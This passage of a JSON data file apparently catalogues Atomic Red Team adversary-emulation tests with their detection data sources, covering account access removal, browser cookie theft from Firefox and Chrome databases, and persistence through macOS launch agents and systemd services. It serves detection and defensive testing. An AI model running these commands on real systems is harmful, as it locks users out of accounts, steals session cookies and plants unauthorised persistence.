System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser remove_user -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members remove_user -Credential 
$Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure remove_user is in the domain admins group\" -foregroundcolor Red\n}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1531", + "display_name": "Account Access Removal", + "atomic_tests": [ + { + "name": "Change User Password - Windows", + "auto_generated_guid": "1b99ef28-f83c-4ec5-8a08-1a56263a5bb2", + "description": "Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account \"AtomicAdministrator\" with\nthe password \"HuHuHUHoHo283283\".\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_account": { + "description": "User account whose password will be changed.", + "type": "String", + "default": "AtomicAdministrator" + }, + "new_user_password": { + "description": "Password to use if user account must be created first", + "type": "String", + "default": "User2ChangePW!" + }, + "new_password": { + "description": "New password for the specified account.", + "type": "String", + "default": "HuHuHUHoHo283283@dJD" + } + }, + "executor": { + "command": "net user #{user_account} #{new_user_password} /add\nnet.exe user #{user_account} #{new_password}\n", + "cleanup_command": "net.exe user #{user_account} /delete >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Delete User - Windows", + "auto_generated_guid": "f21a1d7d-a62f-442a-8c3a-2440d43b19e5", + "description": "Deletes a user account to prevent access. Upon execution, run the command \"net user\" to verify that the new \"AtomicUser\" account was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "new_user_password": { + "description": "Password to use if user account must be created first", + "type": "String", + "default": "User2DeletePW!" 
+ }, + "user_account": { + "description": "User account to be deleted.", + "type": "String", + "default": "AtomicUser" + } + }, + "executor": { + "command": "net user #{user_account} #{new_user_password} /add\nnet.exe user #{user_account} /delete\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Remove Account From Domain Admin Group", + "auto_generated_guid": "43f71395-6c37-498e-ab17-897d814a0947", + "description": "This test will remove an account from the domain admins group\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Requires the Active Directory module for powershell to be installed.\n", + "prereq_command": "if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}\n", + "get_prereq_command": "Add-WindowsCapability -Online -Name \"Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0\"\n" + } + ], + "input_arguments": { + "super_user": { + "description": "Account used to run the execution command (must include domain).", + "type": "String", + "default": "domain\\super_user" + }, + "super_pass": { + "description": "super_user account password.", + "type": "String", + "default": "password" + }, + "remove_user": { + "description": "Account to remove from domain admins.", + "type": "String", + "default": "remove_user" + } + }, + "executor": { + "command": "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + ], + 
"queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account deletion", + "description": "A user account was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + 
"https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1539", + "command_list": [ + "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c $env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe \"$CookieDBLocation\" | out-file -filepath \"#{output_file}\"\n", + "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c #{sqlite3_path} \"$CookieDBLocation\" | out-file -filepath \"$env:temp\\T1539FirefoxCookies.txt\"\n", + "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Network\\Cookies\" | out-file -filepath \"#{output_file}\"\n", + "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c $env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe \"#{cookie_db}\" | out-file -filepath \"#{output_file}\"\n", + "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"#{cookie_db}\" | out-file -filepath \"$env:temp\\T1539ChromeCookies.txt\"\n" + ], + "commands": [ + { + "command": "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path 
\"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c $env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe \"$CookieDBLocation\" | out-file -filepath \"#{output_file}\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + }, + { + "command": "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c #{sqlite3_path} \"$CookieDBLocation\" | out-file -filepath \"$env:temp\\T1539FirefoxCookies.txt\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + }, + { + "command": "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Network\\Cookies\" | out-file -filepath \"#{output_file}\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + }, + { + "command": "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c $env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe \"#{cookie_db}\" | out-file -filepath \"#{output_file}\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + }, + { + "command": "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"#{cookie_db}\" | out-file 
-filepath \"$env:temp\\T1539ChromeCookies.txt\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1539", + "display_name": "Steal Web Session Cookie", + "atomic_tests": [ + { + "name": "Steal Firefox Cookies (Windows)", + "auto_generated_guid": "4b437357-f4e9-4c84-9fa6-9bcee6f826aa", + "description": "This test queries Firefox's cookies.sqlite database to steal the cookie data contained within it, similar to Zloader/Zbot's cookie theft function. \nNote: If Firefox is running, the process will be killed to ensure that the DB file isn't locked. \nSee https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sqlite3_path": { + "description": "Path to sqlite3", + "type": "Path", + "default": "$env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe" + }, + "output_file": { + "description": "Filepath to output cookies", + "type": "Path", + "default": "$env:temp\\T1539FirefoxCookies.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sqlite3 must exist at (#{sqlite3_path})\n", + "prereq_command": "if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip\" -OutFile \"$env:temp\\sqlite.zip\"\nExpand-Archive -path \"$env:temp\\sqlite.zip\" -destinationpath \"$env:temp\\\" -force\n" + } + ], + "executor": { + "command": "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c #{sqlite3_path} \"$CookieDBLocation\" | out-file -filepath \"#{output_file}\"\n", + "cleanup_command": 
"remove-item #{output_file} -erroraction silentlycontinue\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Steal Chrome Cookies (Windows)", + "auto_generated_guid": "26a6b840-4943-4965-8df5-ef1f9a282440", + "description": "This test queries Chrome's SQLite database to steal the encrypted cookie data, designed to function similarly to Zloader/Zbot's cookie theft function. \nOnce an adversary obtains the encrypted cookie info, they could go on to decrypt the encrypted value, potentially allowing for session theft. \nNote: If Chrome is running, the process will be killed to ensure that the DB file isn't locked. \nSee https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "cookie_db": { + "description": "Filepath for Chrome cookies database", + "type": "String", + "default": "$env:localappdata\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" + }, + "sqlite3_path": { + "description": "Path to sqlite3", + "type": "Path", + "default": "$env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe" + }, + "output_file": { + "description": "Filepath to output cookies", + "type": "Path", + "default": "$env:temp\\T1539ChromeCookies.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sqlite3 must exist at (#{sqlite3_path})\n", + "prereq_command": "if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip\" -OutFile \"$env:temp\\sqlite.zip\"\nExpand-Archive -path \"$env:temp\\sqlite.zip\" -destinationpath \"$env:temp\\\" -force\n" + } + ], + "executor": { + "command": "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"#{cookie_db}\" | 
out-file -filepath \"#{output_file}\"\n", + "cleanup_command": "remove-item #{output_file}\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + 
[ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1543.001", + "command_list": [ + "if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp #{path_malicious_plist} ~/Library/LaunchAgents/com.atomicredteam.plist\nsudo launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist\n", + "if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist ~/Library/LaunchAgents/#{plist_filename}\nsudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}\n" + ], + "commands": [ + { + "command": "if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp #{path_malicious_plist} ~/Library/LaunchAgents/com.atomicredteam.plist\nsudo launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist\n", + "source": "atomics/T1543.001/T1543.001.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Launch Agent" + }, + { + "command": "if [ ! 
-d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist ~/Library/LaunchAgents/#{plist_filename}\nsudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}\n", + "source": "atomics/T1543.001/T1543.001.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Launch Agent" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1543.001", + "display_name": "Create or Modify System Process: Launch Agent", + "atomic_tests": [ + { + "name": "Launch Agent", + "auto_generated_guid": "a5983dee-bf6c-4eaf-951c-dbc1a7b90900", + "description": "Create a plist and execute it\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "plist_filename": { + "description": "filename", + "type": "String", + "default": "com.atomicredteam.plist" + }, + "path_malicious_plist": { + "description": "Name of file to store in cron folder", + "type": "String", + "default": "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The shared library must exist on disk at specified location (#{path_malicious_plist})\n", + "prereq_command": "if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"The shared library doesn't exist. Check the path\"; exit 1;\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "if [ ! 
-d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}\nsudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}\n", + "cleanup_command": "sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename}\nsudo rm ~/Library/LaunchAgents/#{plist_filename}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + 
"target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1543.002", + "command_list": [ + "echo \"[Unit]\" > /etc/systemd/system/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> /etc/systemd/system/#{systemd_service_file}\necho \"\" >> /etc/systemd/system/#{systemd_service_file}\necho \"[Service]\" >> /etc/systemd/system/#{systemd_service_file}\necho \"Type=simple\"\necho 
\"ExecStart=#{execstart_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"\" >> /etc/systemd/system/#{systemd_service_file}\necho \"[Install]\" >> /etc/systemd/system/#{systemd_service_file}\necho \"WantedBy=default.target\" >> /etc/systemd/system/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/art-systemd-service.service\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/art-systemd-service.service\necho \"\" >> #{systemd_service_path}/art-systemd-service.service\necho \"[Service]\" >> #{systemd_service_path}/art-systemd-service.service\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"\" >> #{systemd_service_path}/art-systemd-service.service\necho \"[Install]\" >> #{systemd_service_path}/art-systemd-service.service\necho \"WantedBy=default.target\" >> 
#{systemd_service_path}/art-systemd-service.service\nsystemctl daemon-reload\nsystemctl enable art-systemd-service.service\nsystemctl start art-systemd-service.service\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=/bin/touch /tmp/art-systemd-execstoppost-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> 
